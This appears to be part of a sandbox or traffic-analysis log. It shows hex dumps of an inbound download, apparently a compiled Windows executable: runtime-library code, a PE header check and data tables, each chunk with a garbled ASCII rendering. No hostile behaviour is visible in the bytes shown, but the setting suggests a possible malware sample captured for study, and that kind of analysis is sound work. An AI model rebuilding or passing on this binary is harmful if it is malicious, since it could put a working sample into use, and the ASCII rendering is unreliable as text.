2023-10-05 16:48:06 UTC	664	IN	Data Raw: c0 fe c8 22 d8 88 5d f4 83 ee 01 75 eb 8b 4d fc ff 75 18 8b 55 f8 ff 75 f4 ff 75 10 ff 75 e0 52 51 e8 b1 fa ff ff 83 c4 18 5f 5e 5b c9 c3 8b ff 55 8b ec 81 ec 2c 0b 00 00 a1 34 00 50 00 33 c5 89 45 fc 8b 4d 0c 33 c0 8b 55 08 53 56 38 41 04 8b 1a 0f 94 c0 89 95 b4 f6 ff ff 48 89 8d ac f6 ff ff 83 e0 1d 83 c0 19 89 85 b0 f6 ff ff 57 85 db 79 02 33 db 8b 42 04 8b cb 3b d8 72 02 8b c8 2b d9 8d 7a 08 83 c0 08 89 9d c4 f6 ff ff 03 c2 89 bd c0 f6 ff ff 8d 5a 08 89 85 a8 f6 ff ff 03 d9 33 f6 2b c3 89 9d a4 f6 ff ff 89 85 e4 f6 ff ff 33 c9 33 c0 89 b5 e0 f6 ff ff 89 85 e8 f6 ff ff 89 85 2c fe ff ff 3b fb 0f 85 03 01 00 00 8b d8 8b 85 c4 f6 ff ff 85 c0 0f 84 7d 0a 00 00 6a 0a 33 d2 59 f7 f1 89 85 e0 f6 ff ff 8b ca 89 8d d8 f6 ff ff 85 c0 0f 84 17 0a 00 00 83 f8 26 Data Ascii: "]uMuUuuuRQ_^[U,4P3EM3USV8AHWy3B;r+zZ3+33,;}j3Y&
2023-10-05 16:48:06 UTC	672	IN	Data Raw: c0 89 56 0c f3 ab 5f 89 56 10 8b c6 66 89 56 14 88 56 16 89 56 18 89 56 1c 89 56 20 88 56 24 89 56 28 5e 5d c2 0c 00 83 79 08 00 75 13 e8 6a 40 00 00 c7 00 16 00 00 00 e8 6d bc 00 00 32 c0 c3 b0 01 c3 8b ff 53 56 8b f1 33 db 39 5e 0c 75 29 8b 46 08 89 5e 10 66 89 5e 14 88 5e 16 89 5e 18 89 5e 1c 89 5e 20 88 5e 24 89 5e 28 8a 00 84 c0 75 0c c7 46 10 01 00 00 00 32 c0 5e 5b c3 0f b6 c0 50 e8 8a 7a 00 00 59 8b 4e 08 85 c0 74 24 c7 46 10 02 00 00 00 0f b6 01 eb 09 ff 46 08 8b 46 08 0f b6 00 50 e8 67 7a 00 00 59 85 c0 75 ec b0 01 eb c8 80 39 25 75 7c 8d 41 01 80 38 25 74 74 c7 46 10 04 00 00 00 89 46 08 80 38 2a 75 08 40 c6 46 16 01 89 46 08 8b ce e8 10 01 00 00 84 c0 74 97 8b ce e8 99 01 00 00 8b ce e8 a5 02 00 00 8b ce e8 dd 02 00 00 84 c0 0f 84 7a ff ff ff Data Ascii: V_VfVVVVV V$V(^]yuj@m2SV39^u)F^f^^^^^ ^$^(uF2^[PzYNt$FFFPgzYu9%u\|A8%ttFF8*u@FFtz
2023-10-05 16:48:06 UTC	680	IN	Data Raw: 08 e8 70 01 00 00 83 c4 0c 5d c3 6a 01 6a 00 6a 00 e8 60 01 00 00 83 c4 0c c3 6a 01 6a 02 6a 00 e8 51 01 00 00 83 c4 0c c3 8b ff 55 8b ec a1 24 39 50 00 3b 05 34 00 50 00 0f 85 a6 72 00 00 ff 75 08 e8 52 6d ff ff 59 a3 24 39 50 00 5d c3 8b ff 55 8b ec 8b 45 08 a3 24 39 50 00 5d c3 6a 00 ff 15 14 da 4f 00 85 c0 74 34 b9 4d 5a 00 00 66 39 08 75 2a 8b 48 3c 03 c8 81 39 50 45 00 00 75 1d b8 0b 01 00 00 66 39 41 18 75 12 83 79 74 0e 76 0c 83 b9 e8 00 00 00 00 74 03 b0 01 c3 32 c0 c3 8b ff 55 8b ec 6a ff 68 94 67 4c 00 64 a1 00 00 00 00 50 51 56 a1 34 00 50 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 83 65 f0 00 8d 45 f0 50 68 ec b4 4f 00 6a 00 ff 15 10 da 4f 00 85 c0 74 21 68 80 99 4f 00 ff 75 f0 ff 15 20 da 4f 00 8b f0 85 f6 74 0d ff 75 08 8b ce ff 15 00 50 50 00 Data Ascii: p]jjj`jjjQU$9P;4PruRmY$9P]UE$9P]jOt4MZf9u*H<9PEuf9Auytvt2UjhgLdPQV4P3PEdeEPhOjOt!hOu OtuPP
2023-10-05 16:48:06 UTC	688	IN	Data Raw: 8b 40 04 ff 30 e8 4f 4e ff ff 53 89 07 e8 47 4e ff ff 8b 5d f8 8b 0b 8b 09 89 01 8d 47 04 50 e8 35 4e ff ff 8b 0b 56 8b 09 89 41 04 e8 28 4e ff ff 8b 0b 83 c4 10 8b 09 89 41 08 33 c0 eb 03 83 c8 ff 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 14 53 8b d9 57 89 5d ec 8b 03 8b 38 85 ff 75 08 83 c8 ff e9 b7 00 00 00 8b 15 34 00 50 00 8b ca 56 8b 37 83 e1 1f 8b 7f 04 33 f2 33 fa d3 ce d3 cf 85 f6 0f 84 93 00 00 00 83 fe ff 0f 84 8a 00 00 00 89 55 fc 89 7d f4 89 75 f8 83 ef 04 3b fe 72 54 8b 07 3b 45 fc 74 f2 33 c2 8b 55 fc d3 c8 8b c8 89 17 89 45 f0 ff 15 00 50 50 00 ff 55 f0 8b 03 8b 15 34 00 50 00 8b ca 83 e1 1f 8b 00 8b 18 8b 40 04 33 da d3 cb 33 c2 d3 c8 3b 5d f8 89 5d f0 8b 5d ec 75 05 3b 45 f4 74 af 8b 75 f0 8b f8 89 45 f4 eb a2 83 fe ff 74 0d 56 e8 58 7c 00 00 Data Ascii: @0ONSGN]GP5NVA(NA3_^[USW]8u4PV733U}u;rT;Et3UEPPU4P@33;]]]u;EtuEtVX\|
2023-10-05 16:48:06 UTC	696	IN	Data Raw: 3c 80 fa 29 74 35 84 d2 74 91 8a c2 2c 30 3c 09 76 19 8a c2 2c 61 3c 19 76 11 8a c2 2c 41 3c 19 76 09 80 fa 5f 0f 85 70 ff ff ff 8b 06 8a 08 40 89 06 8a d1 88 0f 80 f9 29 75 cb 6a 04 58 5f 5e c9 c3 8b ff 55 8b ec 53 56 8b 75 08 33 d2 57 8b 7d 0c 8b ca 8a 1e 3a 99 cc a4 4d 00 74 08 3a 99 d4 a4 4d 00 75 11 8b 07 8a 18 40 41 89 07 88 1e 83 f9 05 75 e1 b2 01 5f 5e 8a c2 5b 5d c3 8b ff 55 8b ec 53 56 8b 75 08 33 d2 57 8b 7d 0c 8b ca 8a 1e 3a 99 dc a4 4d 00 74 08 3a 99 e0 a4 4d 00 75 11 8b 07 8a 18 40 41 89 07 88 1e 83 f9 04 75 e1 b2 01 5f 5e 8a c2 5b 5d c3 8b ff 55 8b ec 83 ec 2c 8d 4d d4 56 6a 00 e8 c4 30 ff ff 8b 45 08 6a 01 6a 0a 51 51 8b cc 83 61 04 00 89 01 8d 45 d4 50 e8 60 05 00 00 83 c4 14 8d 4d d4 8b f0 e8 fd 30 ff ff 8b c6 5e c9 c3 8b ff 55 8b ec 83 Data Ascii: <)t5t,0<v,a<v,A<v_p@)ujX_^USVu3W}:Mt:Mu@Au_^[]USVu3W}:Mt:Mu@Au_^[]U,MVj0EjjQQaEP`M0^U
2023-10-05 16:48:06 UTC	703	IN	Data Raw: 75 08 85 db 74 6b 57 8d 4d ff e8 5b 03 00 00 ff 75 18 ff 75 14 50 8d 45 f8 57 50 e8 ef d0 00 00 8b d0 83 c4 14 83 fa ff 74 5e 85 d2 74 51 8b 4d f8 81 f9 ff ff 00 00 76 2b 83 fb 01 76 33 81 e9 00 00 01 00 4b 8b c1 89 4d f8 c1 e8 0a 81 e1 ff 03 00 00 0d 00 d8 00 00 66 89 06 83 c6 02 81 c9 00 dc 00 00 66 89 0e 03 fa 83 c6 02 83 eb 01 75 95 8b 5d 0c 2b 75 08 d1 fe 89 3b 8b c6 eb 67 33 ff 33 c0 66 89 06 eb e9 8b 45 0c 89 38 8b 45 18 c6 40 1c 01 c7 40 18 2a 00 00 00 83 c8 ff eb 46 57 8d 4d ff 33 f6 e8 bf 02 00 00 8b 5d 18 eb 16 85 c0 74 c7 83 f8 04 75 01 46 03 f8 8d 4d ff 57 46 e8 a4 02 00 00 53 ff 75 14 50 57 6a 00 e8 3c d0 00 00 83 c4 14 83 f8 ff 75 d5 c6 43 1c 01 c7 43 18 2a 00 00 00 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 2c 83 4d fc ff 8d 4d d4 56 57 33 f6 56 Data Ascii: utkWM[uuPEWPt^tQMv+v3KMffu]+u;g33fE8E@@FWM3]tuFMWFSuPWj<uCC_^[U,MMVW3V
2023-10-05 16:48:06 UTC	711	IN	Data Raw: c3 83 3d 60 01 50 00 ff 75 03 33 c0 c3 53 57 ff 15 f8 d9 4f 00 ff 35 60 01 50 00 8b f8 e8 e0 d0 00 00 8b d8 59 83 fb ff 74 17 85 db 75 59 6a ff ff 35 60 01 50 00 e8 02 d1 00 00 59 59 85 c0 75 04 33 db eb 42 56 6a 28 6a 01 e8 3e af 00 00 8b f0 59 59 85 f6 74 12 56 ff 35 60 01 50 00 e8 da d0 00 00 59 59 85 c0 75 12 33 db 53 ff 35 60 01 50 00 e8 c6 d0 00 00 59 59 eb 04 8b de 33 f6 56 e8 f2 d7 ff ff 59 5e 57 ff 15 18 db 4f 00 5f 8b c3 5b c3 55 8b ec 8b 45 08 85 c0 74 0e 3d 84 3a 50 00 74 07 50 e8 cd d7 ff ff 59 5d c2 04 00 55 8b ec f6 45 08 01 56 8b f1 c7 06 e8 a4 4d 00 74 0a 6a 0c 56 e8 de d1 00 00 59 59 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 8b 4d 08 56 57 85 c9 74 11 8b 55 0c 85 d2 74 0a 8b 75 10 85 f6 75 18 c6 01 00 e8 66 a3 ff ff 6a 16 5e 89 30 e8 6a 1f 00 Data Ascii: =`Pu3SWO5`PYtuYj5`PYYu3BVj(j>YYtV5`PYYu3S5`PYY3VY^WO_[UEt=:PtPY]UEVMtjVYY^]UMVWtUtuufj^0j
2023-10-05 16:48:06 UTC	719	IN	Data Raw: 33 cd 5b e8 79 9c fe ff c9 c3 6a 08 68 a8 f7 4f 00 e8 1b a7 fe ff 8b 45 08 ff 30 e8 d4 ef ff ff 59 83 65 fc 00 8b 4d 0c e8 70 fd ff ff c7 45 fc fe ff ff ff e8 12 00 00 00 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c2 0c 00 8b 45 10 ff 30 e8 b6 ef ff ff 59 c3 8b ff 55 8b ec 83 7d 08 00 74 2d ff 75 08 6a 00 ff 35 3c 3d 50 00 ff 15 74 da 4f 00 85 c0 75 18 56 ff 15 f8 d9 4f 00 50 e8 e1 84 ff ff 59 8b f0 e8 90 84 ff ff 89 30 5e 5d c3 8b ff 55 8b ec 53 56 57 8b 7d 08 3b 7d 0c 74 51 8b f7 8b 1e 85 db 74 0e 8b cb ff 15 00 50 50 00 ff d3 84 c0 74 08 83 c6 08 3b 75 0c 75 e4 3b 75 0c 74 2e 3b f7 74 26 83 c6 fc 83 7e fc 00 74 13 8b 1e 85 db 74 0d 6a 00 8b cb ff 15 00 50 50 00 ff d3 59 83 ee 08 8d 46 04 3b c7 75 dd 32 c0 eb 02 b0 01 5f 5e 5b 5d c3 8b ff 55 8b ec 56 Data Ascii: 3[yjhOE0YeMpEMdY_^[E0YU}t-uj5<=PtOuVOPY0^]USVW};}tQtPPt;uu;ut.;t&~ttjPPYF;u2_^[]UV
2023-10-05 16:48:06 UTC	727	IN	Data Raw: 00 50 00 8d 4d c0 33 c1 89 45 c8 8b 45 18 89 45 cc 8b 45 0c 89 45 d0 8b 45 1c 89 45 d4 8b 45 20 89 45 d8 83 65 dc 00 83 65 e0 00 83 65 e4 00 89 65 dc 89 6d e0 64 a1 00 00 00 00 89 45 c0 8d 45 c0 64 a3 00 00 00 00 8b 45 08 ff 30 e8 af 00 01 00 59 8b 4d 08 89 01 c7 45 f8 01 00 00 00 8b 45 08 89 45 e8 8b 45 10 89 45 ec e8 04 c1 ff ff 8b 40 08 89 45 fc a1 00 50 50 00 89 45 f4 8b 4d fc ff 55 f4 8b 45 fc 89 45 f0 8d 45 e8 50 8b 45 08 ff 30 ff 55 f0 59 59 83 65 f8 00 83 7d e4 00 74 17 64 8b 1d 00 00 00 00 8b 03 8b 5d c0 89 03 64 89 1d 00 00 00 00 eb 09 8b 45 c0 64 a3 00 00 00 00 8b 45 f8 5b c9 c3 55 8b ec 8b 4d 0c 56 8b 75 08 89 0e e8 9b c0 ff ff 8b 48 24 89 4e 04 e8 90 c0 ff ff 89 70 24 8b c6 5e 5d c3 55 8b ec 56 e8 7f c0 ff ff 8b 75 08 3b 70 24 75 0e 8b 76 04 Data Ascii: PM3EEEEEEEE EeeeemdEEdE0YMEEEEE@EPPEMUEEEPE0UYYe}td]dEdE[UMVuH$Np$^]UVu;p$uv
2023-10-05 16:48:06 UTC	735	IN	Data Raw: 81 c9 00 02 00 00 89 4e 58 39 5e 60 74 31 81 c9 00 01 00 00 8d 96 a0 02 00 00 89 4e 58 66 39 1a 0f 85 d7 00 00 00 8b cf 8d 59 02 66 8b 01 83 c1 02 66 3b 85 78 ff ff ff 75 f1 e9 a6 00 00 00 39 5e 5c 74 79 8b 56 50 8d 5a 02 66 8b 02 83 c2 02 66 3b 85 78 ff ff ff 75 f1 2b d3 d1 fa 3b 56 5c 75 59 57 e8 53 03 00 00 59 85 c0 75 24 8b 5e 50 33 d2 8d 4b 02 66 8b 03 83 c3 02 66 3b c2 75 f5 ff 76 50 2b d9 d1 fb e8 7c 03 00 00 59 3b c3 74 6c 81 4e 58 00 01 00 00 8d 96 a0 02 00 00 33 c0 66 39 02 75 58 8b cf 8d 59 02 66 8b 01 83 c1 02 66 3b 85 78 ff ff ff 75 f1 eb 2a 33 db 81 c9 00 01 00 00 8d 96 a0 02 00 00 89 4e 58 66 39 1a 75 2c 8b cf 8d 59 02 66 8b 01 83 c1 02 66 3b 85 78 ff ff ff 75 f1 2b cb d1 f9 8d 41 01 50 57 6a 55 52 e8 90 f3 ff ff 83 c4 10 85 c0 75 1c 8b 46 Data Ascii: NX9^`t1NXf9Yff;xu9^\tyVPZff;xu+;V\uYWSYu$^P3Kff;uvP+\|Y;tlNX3f9uXYff;xu*3NXf9u,Yff;xu+APWjURuF
2023-10-05 16:48:06 UTC	743	IN	Data Raw: 52 e8 48 fb ff ff 53 89 45 f4 e8 88 a2 ff ff 8b 45 f4 83 c4 10 85 c0 74 62 eb 5b 8b 45 f8 8b fb 89 34 88 eb 56 38 5d ff 0f 84 2c ff ff ff f7 d8 89 45 f4 8d 50 02 3b d0 0f 82 19 ff ff ff 81 fa ff ff ff 3f 0f 83 0d ff ff ff 6a 04 52 51 e8 fb fa ff ff 53 89 45 f8 e8 3b a2 ff ff 8b 45 f8 83 c4 10 85 c0 0f 84 ed fe ff ff 8b 4d f4 8b fb 89 34 88 89 5c 88 04 a3 5c 3a 50 00 39 5d 0c 0f 84 88 00 00 00 8d 4e 01 8a 06 46 84 c0 75 f9 2b f1 6a 01 8d 46 02 50 89 45 f4 e8 a7 bd ff ff 8b f0 59 59 85 f6 75 08 53 e8 eb a1 ff ff eb 4c ff 75 08 ff 75 f4 56 e8 18 83 ff ff 83 c4 0c 85 c0 75 6f 8b 4d f0 8b c6 2b 45 08 41 03 c8 0f be 45 ff f7 d8 1b c0 23 c1 88 59 ff 50 56 e8 8c 8a 00 00 59 59 85 c0 75 1f e8 71 26 ff ff 56 c7 00 2a 00 00 00 e8 a0 a1 ff ff 83 cb ff 59 57 e8 96 a1 Data Ascii: RHSEEtb[E4V8],EP;?jRQSE;EM4\\:P9]NFu+jFPEYYuSLuuVuoM+EAE#YPVYYuq&V*YW
2023-10-05 16:48:06 UTC	750	IN	Data Raw: ec eb ff ff 8b 85 e8 eb ff ff 3b d8 72 cb 8b c7 2b 45 10 89 46 04 3b bd f4 eb ff ff 0f 82 46 ff ff ff eb 08 ff 15 f8 d9 4f 00 89 06 8b 4d fc 8b c6 5f 5e 33 cd 5b e8 46 1f fe ff c9 c3 8b ff 55 8b ec 5d e9 00 00 00 00 8b ff 55 8b ec 8b 45 08 56 85 c0 75 18 e8 c2 07 ff ff c7 00 16 00 00 00 e8 c5 83 ff ff 83 c8 ff e9 67 01 00 00 8b 40 0c 53 90 33 db c1 e8 0d 43 84 c3 0f 84 50 01 00 00 8b 45 08 8b 40 0c 90 c1 e8 0c 84 c3 0f 85 3e 01 00 00 8b 45 08 8b 40 0c 90 d1 e8 84 c3 8b 45 08 74 0e 6a 10 59 83 c0 0c f0 09 08 e9 20 01 00 00 83 c0 0c f0 09 18 8b 45 08 8b 40 0c 90 a9 c0 04 00 00 75 09 ff 75 08 e8 c8 4e 00 00 59 8b 45 08 57 8b 48 04 89 08 8b 45 08 50 8b 70 18 8b 78 04 e8 e6 9a ff ff 56 57 50 e8 e7 08 00 00 8b 4d 08 83 c4 10 89 41 08 8b 45 08 5f 8b 50 08 85 d2 Data Ascii: ;r+EF;FOM_^3[FU]UEVug@S3CPE@>E@EtjY E@uuNYEWHEPpxVWPMAE_P
2023-10-05 16:48:06 UTC	758	IN	Data Raw: d8 e8 fe ff c7 00 16 00 00 00 e8 db 64 ff ff 33 c0 e9 20 01 00 00 83 7d 0c 00 74 e3 56 8b 75 10 33 c0 66 89 07 85 f6 75 17 e8 ae e8 fe ff c7 00 16 00 00 00 e8 b1 64 ff ff 33 c0 e9 f5 00 00 00 ff 75 1c 8d 4d e4 e8 4f 7d fe ff 83 7d 18 00 75 0c 8b 45 e8 8b 80 9c 00 00 00 89 45 18 8b 45 0c 8b cf 53 89 4d f8 33 db 89 45 fc 0f b7 16 66 85 d2 0f 84 81 00 00 00 83 fa 25 74 15 66 89 11 8b 4d f8 8b 45 fc 83 c1 02 48 89 4d f8 89 45 fc eb 5c 39 5d 14 74 7c 83 c6 02 88 5d f4 0f b7 06 8b c8 83 f8 23 75 0a 83 c6 02 c6 45 f4 01 0f b7 0e 66 83 f9 45 74 09 0f b7 c1 66 83 f9 4f 75 06 83 c6 02 0f b7 06 ff 75 f4 8d 4d fc ff 75 18 51 8d 4d f8 51 ff 75 14 50 8d 45 e8 50 e8 ab 02 00 00 83 c4 1c 84 c0 8b 45 fc 74 1f 8b 4d f8 83 c6 02 85 c0 0f 85 73 ff ff ff 85 c0 74 3d 8b 5d 0c Data Ascii: d3 }tVu3fud3uMO}}uEEESM3Ef%tfMEHME\9]t\|]#uEfEtfOuuMuQMQuPEPEtMst=]
2023-10-05 16:48:06 UTC	766	IN	Data Raw: ff 50 8d 85 60 fc ff ff 89 9d 5c fc ff ff 56 50 89 9d 8c fa ff ff e8 be 5d fe ff 83 c4 10 e9 ca 03 00 00 8d 8a ce fb ff ff 8b f7 8b c1 33 d2 83 e1 1f c1 e8 05 2b f1 89 85 ac f8 ff ff 89 8d 9c f8 ff ff 8b c3 8b ce 89 b5 80 f8 ff ff e8 df 60 ff ff 8b 95 b8 f8 ff ff 48 83 a5 90 f8 ff ff 00 89 85 b0 f8 ff ff f7 d0 89 85 84 f8 ff ff 8b 8c 95 2c fe ff ff 0f bd c1 74 09 40 89 85 b8 f8 ff ff eb 07 83 a5 b8 f8 ff ff 00 8b 8d ac f8 ff ff be cc 01 00 00 8d 04 11 83 f8 73 76 2b 33 c0 50 89 85 8c fa ff ff 89 85 2c fe ff ff 8d 85 90 fa ff ff 50 8d 85 30 fe ff ff 56 50 e8 19 5d fe ff 83 c4 10 e9 e2 00 00 00 2b bd b8 f8 ff ff 3b bd 9c f8 ff ff 1b c0 f7 d8 03 c1 03 c2 89 85 88 f8 ff ff 83 f8 73 77 b6 8d 79 ff 48 89 bd 98 f8 ff ff 89 85 b4 f8 ff ff 3b c7 0f 84 91 00 00 00 Data Ascii: P`\VP]3+`H,t@sv+3P,P0VP]+;swyH;
2023-10-05 16:48:06 UTC	774	IN	Data Raw: c3 8b 65 e8 e8 a9 c0 fe ff cc 55 8b ec 83 ec 64 53 56 57 8b 7d 18 33 c0 57 ff 75 14 89 45 f0 ff 75 0c 88 45 e8 e8 a1 28 00 00 8b c8 83 c4 0c 89 4d f8 83 f9 ff 0f 8c 6e 03 00 00 3b 4f 04 0f 8d 65 03 00 00 8b 5d 08 81 3b 63 73 6d e0 0f 85 f7 00 00 00 83 7b 10 03 0f 85 ed 00 00 00 81 7b 14 20 05 93 19 74 16 81 7b 14 21 05 93 19 74 0d 81 7b 14 22 05 93 19 0f 85 ce 00 00 00 33 f6 39 73 1c 0f 85 c3 00 00 00 e8 67 05 ff ff 39 70 10 0f 84 ae 02 00 00 e8 59 05 ff ff 8b 58 10 e8 51 05 ff ff c6 45 e8 01 8b 40 14 89 45 fc 85 db 0f 84 f5 02 00 00 81 3b 63 73 6d e0 75 2a 83 7b 10 03 75 24 81 7b 14 20 05 93 19 74 12 81 7b 14 21 05 93 19 74 09 81 7b 14 22 05 93 19 75 09 39 73 1c 0f 84 c3 02 00 00 e8 08 05 ff ff 39 70 1c 74 62 e8 fe 04 ff ff 8b 40 1c 89 45 f4 e8 f3 04 ff Data Ascii: eUdSVW}3WuEuE(Mn;Oe];csm{{ t{!t{"39sg9pYXQE@E;csmu*{u${ t{!t{"u9s9ptb@E
2023-10-05 16:48:06 UTC	782	IN	Data Raw: 50 00 48 0b 50 00 c7 05 04 40 50 00 50 0b 50 00 c3 6a 08 68 00 fb 4f 00 e8 14 ad fd ff a1 0c 40 50 00 90 85 c0 75 2e 6a 06 e8 c6 f5 fe ff 59 83 65 fc 00 a1 0c 40 50 00 90 85 c0 75 0c e8 18 05 00 00 f0 ff 05 0c 40 50 00 c7 45 fc fe ff ff ff e8 10 00 00 00 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c3 6a 06 e8 9f f5 fe ff 59 c3 8b ff 55 8b ec 51 51 57 bf 54 be 4f 00 8d 45 fc 57 68 00 01 00 00 ff 75 08 50 e8 c7 c1 fe ff 83 c4 10 85 c0 75 05 8b 45 08 eb 49 83 f8 22 74 04 33 c0 eb 40 8b 45 fc 03 c0 56 50 e8 f4 0e ff ff 8b f0 59 85 f6 75 0a 50 e8 9c 05 ff ff 33 c0 eb 21 57 ff 75 fc 8d 45 f8 56 50 e8 87 c1 fe ff 83 c4 10 85 c0 74 03 56 eb df 6a 00 e8 79 05 ff ff 8b c6 59 5e 5f c9 c3 8b ff 55 8b ec 6a 20 ff 75 08 6a 40 ff 75 0c e8 0d 38 ff ff 83 c4 10 85 c0 75 Data Ascii: PHP@PPPjhO@Pu.jYe@Pu@PEMdY_^[jYUQQWTOEWhuPuEI"t3@EVPYuP3!WuEVPtVjyY^_Uj uj@u8u
2023-10-05 16:48:06 UTC	789	IN	Data Raw: ff ff dd 55 dc d9 ee 81 fa ce fb ff ff 7d 0a 33 c0 de c9 40 e9 f3 00 00 00 de d9 df e0 f6 c4 41 75 0d c7 45 f4 01 00 00 00 c6 45 ff 01 eb 09 83 65 f4 00 32 c0 88 45 ff 8b 45 e2 32 c9 83 e0 0f c6 45 fe 00 83 c8 10 89 4d ec 66 89 45 e2 b8 03 fc ff ff 3b d0 7d 42 89 7d f8 2b c2 8b 7d dc 8b 5d f8 8b cf 83 e1 01 89 4d ec 74 09 85 db 75 01 43 c6 45 fe 01 d1 ef f6 45 e0 01 89 7d dc 74 09 81 cf 00 00 00 80 89 7d dc d1 6d e0 83 e8 01 75 d1 89 5d f8 8b 5d 08 eb 03 8b 7d dc 83 7d f4 00 dd 45 dc 74 0d d9 e0 dd 55 f0 dd 55 dc 8b 7d dc eb 03 dd 55 f0 84 c9 75 05 38 4d fe 74 4b dd d8 e8 5d 02 ff ff 85 c0 74 1c 3d 00 01 00 00 74 0e 3d 00 02 00 00 75 2f 8a 45 ff 34 01 eb 03 8a 45 ff 84 c0 eb 10 80 7d ec 00 74 1b 80 7d fe 00 75 06 f6 45 dc 01 74 0f 83 c7 01 89 7d dc 83 55 Data Ascii: U}3@AuEEe2EE2EMfE;}B}+}]MtuCEE}t}mu]]}}EtUU}Uu8MtK]t=t=u/E4E}t}uEt}U
2023-10-05 16:48:06 UTC	797	IN	Data Raw: 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 a2 4e 41 00 ab 3d 41 00 ad 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 24 4f 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 8b 4e 41 00 b8 4e 41 00 cb 4e 41 00 db 4d 41 00 c9 4f 41 00 e4 4f 41 00 d0 45 41 00 2b 50 41 00 46 50 41 00 61 50 41 00 7a 50 41 00 c2 50 41 00 d0 45 41 00 f2 50 41 00 d0 45 41 00 1e 51 41 00 45 51 41 00 d0 45 41 00 d0 45 41 00 d0 45 41 00 6c 51 41 00 d0 45 41 00 9f 51 41 00 e5 51 41 00 a0 47 41 00 b7 47 41 00 cd 47 41 00 25 47 41 00 b3 48 41 00 e4 47 41 00 fa 47 41 00 21 48 41 00 25 47 41 00 2e 48 41 00 3b 48 41 00 61 48 41 00 87 48 41 00 25 47 Data Ascii: NANANANANANANA=ANANANANANANANANA$OANANANANANANANANANANANANAMAOAOAEA+PAFPAaPAzPAPAEAPAEAQAEQAEAEAEAlQAEAQAQAGAGAGA%GAHAGAGA!HA%GA.HA;HAaHAHA%G
2023-10-05 16:48:06 UTC	805	IN	Data Raw: 00 00 00 00 00 50 1b 00 00 6a 1b 00 00 00 00 00 00 6b 1b 00 00 73 1b 00 00 11 00 00 00 74 1b 00 00 7e 1b 00 00 00 00 00 00 80 1b 00 00 81 1b 00 00 11 00 00 00 82 1b 00 00 a1 1b 00 00 00 00 00 00 a2 1b 00 00 a5 1b 00 00 11 00 00 00 a6 1b 00 00 a7 1b 00 00 00 00 00 00 a8 1b 00 00 a9 1b 00 00 11 00 00 00 aa 1b 00 00 aa 1b 00 00 00 00 00 00 ab 1b 00 00 ad 1b 00 00 11 00 00 00 ae 1b 00 00 e5 1b 00 00 00 00 00 00 e6 1b 00 00 e6 1b 00 00 11 00 00 00 e7 1b 00 00 e7 1b 00 00 00 00 00 00 e8 1b 00 00 e9 1b 00 00 11 00 00 00 ea 1b 00 00 ec 1b 00 00 00 00 00 00 ed 1b 00 00 ed 1b 00 00 11 00 00 00 ee 1b 00 00 ee 1b 00 00 00 00 00 00 ef 1b 00 00 f1 1b 00 00 11 00 00 00 f2 1b 00 00 f3 1b 00 00 00 00 00 00 fc 1b 00 00 2b 1c 00 00 00 00 00 00 2c 1c 00 00 33 1c 00 00 11 00 Data Ascii: Pjkst~+,3
2023-10-05 16:48:06 UTC	813	IN	Data Raw: 00 9c bc 01 00 00 00 00 00 9d bc 01 00 9e bc 01 00 11 00 00 00 9f bc 01 00 9f bc 01 00 00 00 00 00 a0 bc 01 00 a3 bc 01 00 12 00 00 00 00 cf 01 00 2d cf 01 00 11 00 00 00 30 cf 01 00 46 cf 01 00 11 00 00 00 50 cf 01 00 c3 cf 01 00 00 00 00 00 00 d0 01 00 f5 d0 01 00 00 00 00 00 00 d1 01 00 26 d1 01 00 00 00 00 00 29 d1 01 00 66 d1 01 00 00 00 00 00 67 d1 01 00 69 d1 01 00 11 00 00 00 6a d1 01 00 72 d1 01 00 00 00 00 00 73 d1 01 00 7a d1 01 00 12 00 00 00 7b d1 01 00 82 d1 01 00 11 00 00 00 83 d1 01 00 84 d1 01 00 00 00 00 00 85 d1 01 00 8b d1 01 00 11 00 00 00 8c d1 01 00 a9 d1 01 00 00 00 00 00 aa d1 01 00 ad d1 01 00 11 00 00 00 ae d1 01 00 e8 d1 01 00 00 00 00 00 42 d2 01 00 44 d2 01 00 11 00 00 00 e0 d2 01 00 f3 d2 01 00 00 00 00 00 60 d3 01 00 78 d3 Data Ascii: -0FP&)fgijrsz{BD`x
2023-10-05 16:48:06 UTC	821	IN	Data Raw: 00 d9 a9 41 00 26 a9 41 00 fb a9 41 00 da ad 41 00 da ad 41 00 20 b1 41 00 a3 ae 41 00 a3 ae 41 00 da ad 41 00 da ad 41 00 20 b1 41 00 11 ae 41 00 3e ae 41 00 19 af 41 00 a3 ae 41 00 a3 ae 41 00 a3 ae 41 00 a3 ae 41 00 a3 ae 41 00 a3 ae 41 00 2f ae 41 00 18 b0 41 00 fc ad 41 00 49 b0 41 00 38 c1 41 00 38 c1 41 00 38 c1 41 00 60 b0 41 00 74 b0 41 00 1d c7 41 00 0a ca 41 00 13 cd 41 00 13 cd 41 00 13 cd 41 00 13 cd 41 00 13 cd 41 00 9b ca 41 00 13 cd 41 00 13 cd 41 00 13 cd 41 00 13 cd 41 00 13 cd 41 00 13 cd 41 00 13 cd 41 00 30 cb 41 00 13 cd 41 00 13 cd 41 00 1d c7 41 00 9b cb 41 00 a4 cb 41 00 13 cd 41 00 13 cd 41 00 1d c7 41 00 13 cd 41 00 1d c7 41 00 7b d2 41 00 f2 d2 41 00 f2 d2 41 00 f2 d2 41 00 f2 d2 41 00 9a d2 41 00 f2 d2 41 00 f2 d2 41 00 f2 d2 Data Ascii: A&AAAA AAAAA AA>AAAAAAAA/AAAIA8A8A8A`AtAAAAAAAAAAAAAAAA0AAAAAAAAAAA{AAAAAAAA
